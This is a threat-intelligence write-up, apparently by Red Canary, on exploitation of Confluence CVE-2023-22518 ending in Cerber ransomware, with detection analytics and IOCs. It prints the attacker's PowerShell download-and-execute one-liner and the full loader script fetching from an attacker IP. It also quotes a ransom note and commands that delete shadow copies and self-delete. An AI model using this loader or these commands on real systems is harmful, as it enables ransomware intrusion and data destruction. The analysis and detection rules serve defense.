On November 5, 2023, Red Canary detected suspected exploitation of Atlassian Confluence CVE-2023-22518 that led to an attempt to deploy Cerber ransomware. The activity we observed is similar to intrusions previously reported by The DFIR Report and Rapid7. We’ve decided to publish our own observations and detection guidance to help the community better defend against this threat.
CVE-2023-22518 is an improper authorization vulnerability within Confluence Data Center and Confluence Server that allows unauthenticated users to perform a “restore from backup” by submitting their own arbitrary .zip file. Adversaries can exploit the vulnerability to destroy Confluence instances, leading to data loss. Alternatively, adversaries may also submit a .zip file containing a web shell to achieve remote code execution (RCE) on vulnerable, on-premise Confluence servers.
Red Canary recommends following Atlassian’s guidance to update on-premise instances of Confluence to one of the listed versions:
- 7.19.16 or later
- 8.3.4 or later
- 8.4.4 or later
- 8.5.3 or later
- 8.6.1 or later
Observed behaviors
If successfully exploited, CVE-2023-22518 could enable an adversary to upload arbitrary content to Confluence instances without authentication using a “restore from backup archive” function. Atlassian stated in its security advisory that there is “…no impact to confidentiality as an attacker cannot exfiltrate any instance data.” However, an adversary that uploads a specially crafted .zip archive file may be able to upload a web shell that could allow for arbitrary remote code execution on the system in addition to wiping data from a Confluence instance (as Atlassian initially reported).
After gaining initial access, the adversary ran the reconnaissance command: cmd /c whoami. The adversary then executed encoded PowerShell commands, which you can see decoded below:
IEX((New-Object Net.WebClient).DownloadString("http://193.176.179[.]41/tmp.48"))The contents of the downloaded tmp.48 file are shown below:
function Download_Execute
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL
)
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add("User-Agent","Mozilla/4.0+")
$webclient.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$webclient.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$ProxyAuth = $webclient.Proxy.IsBypassed($URL)
if($ProxyAuth)
{
[string]$hexformat = $webClient.DownloadString($URL)
}
else
{
$webClient = New-Object -ComObject InternetExplorer.Application
$webClient.Visible = $false
$webClient.Navigate($URL)
while($webClient.ReadyState -ne 4) { Start-Sleep -Milliseconds 100 }
[string]$hexformat = $webClient.Document.Body.innerText
$webClient.Quit()
}
[Byte[]] $temp = $hexformat -split ' '
[System.IO.File]::WriteAllBytes("$env:temp\svcPrvinit.exe", $temp)
$args = "-b 9"
Start-Process -FilePath "$env:temp\svcPrvinit.exe" -WindowStyle Hidden -ArgumentList $args
}
Download_Execute http://193.176.179[.]41/tmp.48.txtThe script performs multiple actions:
- The script defines a function named
Download_Executethat initializes a .NET WebClient object that sets the HTTP User-Agent string to mimic Mozilla 4.0 and configures proxy settings. - The script checks to see whether the specified proxy server should be used by the Confluence server. If so, the script will use that web client to download the specified file. If not, the script uses an Internet Explorer Component Object Model (COM) object to download the script.
- The script downloads a Cerber ransomware executable, saves it to the Temp folder under the name
svcprvinit.exe, and runs the process with the command-line arguments-b 9without displaying a window. - The last line of the file calls the
Download_Executefunction, specifying it to reach out to the IP address193.176.179[.]41and downloadtmp.48.txtand extract the Cerber ransomware file from it.
tmp.48.txt was saved on disk at the path C:\Windows\Temp\svcprvinit.exe. It’s worth noting that the first submission of the ransomware binary on VirusTotal was on November 1, suggesting that exploitation may have begun within 24 hours of initial disclosure of the CVE, which Atlassian released publicly on October 31. This is in line with what Red Canary has repeatedly observed in the past—namely, widespread exploitation attempts mere days after a public disclosure of critical security vulnerabilities.
Ransomware analysis
Red Canary was able to obtain and analyze svcprvinit.exe, which is a Cerber ransomware sample that we assess was likely derived from materials exposed in the Conti ransomware leaks. Upon execution, the binary encrypts files on local disks and in network shares, appends the .LOCK3D file extension, creates a mutex in memory, deletes volume shadow copies, drops ransom notes, and deletes itself.
The ransomware binary uses ChaCha (a modification of the Salsa20 stream cipher) to encrypt files. This is consistent with the last known build of Conti using ChaCha for file encryption. The binary also contains the capability to use AES and RC4 for different encryption operations (e.g., encrypting keys).
The ransomware binary creates the mutex hsfjuukjzloqu28oajh727190 to ensure that only one instance of the malware is running at a time. Security researchers have discovered that this particular mutex has been shared across Conti samples and additional ransomware families, allegedly derived from leaked Conti material. The binary supports encrypting multiple file types on local drives as well as remote file shares.
The ransomware drops the following ransom note, named read-me3.txt, in each encrypted folder:
C3RB3R INSTRUCTIONS
*************************************************************************
IMPORTANT : DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED!!!
All your important files have been encrypted. Any attempts to restore your files with thrid-party software will be fatal for your files! The only way to decrypt your files safely is to buy the special decryption software "C3rb3r Decryptor". We have also downloaded a lot of data from your system. If you do not pay, we will sell your data on the dark web.
You should get more information on our page, which is located in a Tor hidden network.
1.Download Tor browser - https://www.torproject.org/
2.Install and run Tor browser
3.Connect with the button "Connect"
4.Open link in Tor browser : http://j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad.onion/<unique path>
5.The site should be loaded. if for some reason the site is not loading wait for a moment and try again
6.Follow the instructions on this page
You can proceed with purchasing of the decryption software at your personal page:
*************************************************************************
http://j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad.onion/<unique path>
At this page you will receive the complete instructions how to buy the decryption software for restoring all your files. Also at this page you will be able to restore any one file for free to be sure "C3rb3r Decryptor" will help you.
ATTENTION:
1.Do not try to recover files yourself, this process can damage your data and recovery will become impossible.
2.Do not waste time trying to find the solution on the internet. The longer you wait, the higher will become the decryption software price.
3.Tor Browser may be blocked in your country or corporate network. Use Tor Browser over VPN.The ransomware then uses cmd.exe and wmic.exe to delete volume shadow copies with the following command:
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='<VSS ID>'" deleteFinally, the ransomware deletes itself:
"C:\Windows\system32\cmd.exe" /c del c:\windows\temp\svcprvinit.exe >> NULIdentifying on-premise Confluence installations
CVE-2023-22518 only affects vulnerable on-premise instances of Confluence. This detection opportunity identifies potential instances of on-premise Confluence, but we’d like to emphasize that this detection only helps identify in EDR data whether or not you have a Confluence server in your organization. This query does not show signs of malicious activity.
parent_process == (java || tomcat)
&&
command_includes == (confluence)
Detection opportunities
The following are pseudo-detection analytics that are intended as a starting point for detecting relevant malicious or suspicious activity. They may require tuning depending on false positive levels and what constitutes normal behavior in your environment.
Detection opportunity: Tomcat spawning Windows Command Shell or PowerShell and performing reconnaissance
This pseudo-detector looks for endpoint activity you’re likely to see resulting from the specific exploitation of CVE-2023-22518 described in this article. It should unearth instances of Tomcat spawning either PowerShell or the Windows Command Shell and running reconnaissance commands.
parent_process == (tomcat)
&&
process == (cmd || powershell)
&&
child_process == (whoami.exe || nltest.exe)
Detection opportunity: PowerShell invoke expression and DownloadString to download remotely hosted files
This pseudo-detector identifies instances of PowerShell leveraging iex(New-Object Net.WebClient).DownloadString to download remotely hosted files.
process == (powershell.exe)
&&
command_includes == (IEX((New-Object Net.WebClient).DownloadString))
Detection opportunity: Encoded PowerShell commands
This detection analytic looks for abuse of the shortened encoded PowerShell command switch. This activity is often used by adversaries to obfuscate the use of malicious code on an endpoint. You may be able to refine the accuracy of this detector by looking for the execution of encoded PowerShell commands in conjunction with external network connections and the creation of executable files on disk.
Note: We also recommend checking out Red Canary’s Threat Detection Report section on PowerShell. The page contains additional PowerShell detection analytics that can be applied for protection against this and other threats.
process == (powershell.exe)
&&
command_includes == “(-e || -en || -enc || -enco || [any variation of the encoded command switch]*)
*Note: Any variation of the encoded command switch from -e to -encodedcommand will encode PowerShell commands.
Detection opportunity: PowerShell or Windows Command Shell bypassing execution policies
This detection analytic identifies adversaries leveraging PowerShell or the Windows Command Shell in an attempt to bypass execution policies by running commands with the -exec switch and the bypass flag, which are commonly used by adversaries to subvert security measures like antivirus.
process == (powershell.exe || cmd.exe)
&&
command_includes == (-exec && bypass)
IOCs
| IOC | TYPE | NOTE |
|---|---|---|
| IOC:
| TYPE: IP | NOTE: IP address that hosted malicious |
| IOC:
| TYPE: SHA-256 | NOTE: SHA256 of |
| IOC:
| TYPE: SHA-256 | NOTE: SHA256 of |
| IOC:
| TYPE: SHA-256 | NOTE: SHA256 of |
| IOC:
| TYPE: Mutex | NOTE: Mutex of |
| IOC:
| TYPE: File Path | NOTE: File path of |
Conclusion
Organizations running vulnerable, on-premise Confluence installations should consider updating those systems as soon as possible. In the meantime, the information in this article should help security teams identify whether they’re running Confluence on-premise and detect suspicious activity accordingly.